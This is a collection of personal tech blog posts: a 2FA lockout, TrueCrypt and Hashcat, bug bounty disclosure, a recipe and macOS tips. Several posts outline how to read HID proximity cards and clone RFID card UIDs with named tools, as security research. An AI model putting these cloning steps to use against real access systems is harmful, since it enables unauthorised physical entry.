Last month I got a new iPhone. This month I realized I forgot my Xbox One password when I tried to log in to download some Games With Gold.
I didnt think this would be a problem. I forget and rest passwords all the time.
So I go through the normal steps and have it send me an email:
Then I get this screen:
Did I mention I got a new phone? When you get a new phone the authenticator app resets and you have to add back your account so I click I dont know.
I have to take responsibility for this. I didn’t save a recovery code on my mac so I click no and I get this screen:
This is where this goes off the rails for me. 30 days To reset my Xbox account because I enabled 2FA?
So I call Xbox support and Jacqueline says there is nothing they can do and I have to wait until January to reset my account password.
How does this make any sense? Without 2FA I could have reset my password in 30 seconds with no problem but since I enabled it I wont be able to use my Xbox for a month?
Microsoft couldn’t text me a one time password, or give me a call or email an alternative email? Someone decided 30 days was the right answer?
Microsoft you are doing account management wrong. If you need me I will be buying a PS4.
UPDATE: After 2 hours and 43 minutes on the phone and zero help from any Microsoft staff I was able to find out that you can get a new recovery code for 2FA on the actual XBoxOne console:
After I did that I was able to reset my password and disable 2FA.
Blog Posts
On Wednesday night I tweeted this:
If you are using TrueCrypt you should stop. Hashcat is now optimized to crack TrueCrypt volumes. https://t.co/voBdtKuuHW
— Jerry Gamblin (@JGamblin) December 10, 2015
I started getting retweets and replies like this on Friday from people I respect (and a bunch from people I don’t know):
@JGamblin this is a non sequitur. there are valid reasons to stop using TC, but Hashcat isn't one of them.
— Kyle Maxwell (@kylemaxwell) December 11, 2015
https://twitter.com/averagesecguy/status/674768017864134657
So people REALLY like TrueCrypt or I didn’t make my point articulately enough. In case I didnt make my point well enough I will try to lay it out here.
3 Reasons Why I Think You Should Stop Using TrueCrypt:
The developer stopped maintaining it, took down the webpage and replaced it with this.
“WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues“.
I think that this reason should be more than enough to get 99% of people to stop using it.
The latest version of HashCat includes support for TrueCrypt volumes.
If you are using good passphrases (most people don’t) it really isnt a big deal but it does lower the level of complexity for hacking a TrueCrypt volume with a weak password from a medium-high skill level (Think Security Professional) to downloading kali and following instructions (Think Help Desk Analyst).
The developer stopped maintaining it, took down the webpage and replaced it with this.
“WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues“.
There are many other open source and paid alternatives that you can evaluate and pick the best one for you. So unless you have an amazingly valid reason to not move off of TrueCrypt you should move off it as soon as possible.
HID proximity cards encode a facility code and internal card number in hex on most cards. Decoding it is extremely easy and should take less than a minute.
Equipent Needed:
Omnikey Reader (I like the 5025CL)
RFIDIOT
BRIVO Card Calculator
Steps:
Run isotype.py from the RFIDIot tool kit and copy the ID:
Past the ID into the BRIVO decoder:
It is really that simple. A made a quick video demo (that is tinted purple for some reason):
I have some writeable HID proximity cards on the way and will have a blog up soon on how to completely clone one.
As part of my research into RFID security I came across the “EM4100 RFID Cloner kit” by KBEmbedded which outside of having a terrible name is an amazing low-frequency (125 kHz) self-contained RFID cloner that can store and replay 16 cards.
I was lucky enough to be in the Portland area this week and be able to have dinner with Kris Bahnsen who designed the board and he said the that he thinks he could rewrite the software to read and replay HID proximity cards which would make this a must have gadget for all security professionals.
As it stands now this is an awesome $25 tool that is amazingly fun to play with and you should order one!
I have recently started investigating RFID security and picked up a Chameleon Mini. It is an amazing project with a ton of potential. In these quick demo videos I will show how to clone the UID of both a Mifare 1K 4B card and a Mifare 1K 7B card using the Chameleon.
Cloning the Mifare 1K UID (Aria Card):
Cloning the Mifare 1K 7B UID (Oyster Card):
These were both extremely simple to do. In the future I will be demoing how to take full card dumps from an RFID card and load it on to the Chameleon Mini for a “true clone”.
Tool List:
ACR122U
ChamelemonMini
ZTerm
LibNFC
Cardpeek
Oyster Card
Aria Card
Hardware Picture:
Disclaimer: While cloning the UID isnt a full spoof of the card WAY (READ:MOST) more organizations rely on UID based authentication then should. While the tools say the UIDs have been cloned I have not tested these on any live systems and would not without permission.
Yesterday Randy Westergren wrote this blog post: United Airlines Bug Bounty: An experience in reporting a serious vulnerability. I do not know Randy and do not think he did anything wrong but his post is a perfect example of why companies I talk to are afraid of implementing bug bounty programs.
He hit the trinity of why companies fear bug bounty programs in one post:
- Their development cycle wasn’t fast enough for the researcher.
Is six months a “more than reasonable time frame”? On the surface sure but unless you go to their planning games, know their regulatory commitments, roadmap and backlog you can not say that for sure.Most companies have enough internal and contractual pressure on their development cycles to have a researcher who is “helping” add another source.
- The researcher involved the press:
Companies do not want to be in the press for having poor security. So sure when he contacted the press they fixed the issue but it didn’t win him or security researchers any friends at United.Companies do not want to manage a bug bounty program as a fire fighting exercise. They want to intake the bugs into their regular development cycle and work them in their normal process.
- The researcher went “rogue”:
He wasn’t going to get compensated for his work since it was a duplicate so the only kind of compensation he could still get was to go public. Companies cant pay for every duplicate bug found and it only takes one researchers to go rogue to sour a bug bounty program for a company.
While I do not fault Randy for his blog post or thought process a company gives up a lot of legal cover by running a bug bounty program. If they do not perform to a researchers expectation and they get called out in this manner is a reason for them to think twice about their program and if it is worth it.
I love Thanksgiving dinner.
I hate the omnipresent canned shaped cranberry sauce:
Especially since making your own is this easy:
Ingredients
1 cup sugar
1 cup Orange Juice.
1/2 Teaspoon Ground Cinnamon
One 12-ounce bag cranberries
Directions
Combine the sugar, orange juice, cinnamon, and cranberries in a medium saucepan.
Bring up to a simmer over medium heat and cook for 15 minutes.
Let cool completely before serving.
Enjoy!
I was invited to attend the 2015 Digicert Security Summit this week in Las Vegas. For a one day conference it had some really amazing talks by some of the smartest people in the industry.
Gary McGraw gave an amazing talk on security software development life cycle and the Building Security in Maturity Model (BSIMM).
Emily Stark talked about the future of HTTPS everywhere and demoed the new security tab in the developer menu in chrome:
Dan Kaminsky did Dan Kaminsky stuff.
Runa Sandvik gave an amazing humorous, thought provoking and informative talk on protecting press sources on the internet.
Digicert also gave me this iOS controlled drone which seems to be amazingly hackable:
I take a lot of screenshots in OSX (⌘+shift+4) to share and for the longest time I just lived with the 2003-era super cool shadow:
I finally got tired of it and found the solution to turning it off is these two terminal commands:
defaults write com.apple.screencapture disable-shadow -bool true
killall SystemUIServer
Now my screenshots look like this:
If for some reason you would want to re-live 2003 you can re-enable the drop shadow with these commands:
defaults write com.apple.screencapture disable-shadow -bool false
killall SystemUIServer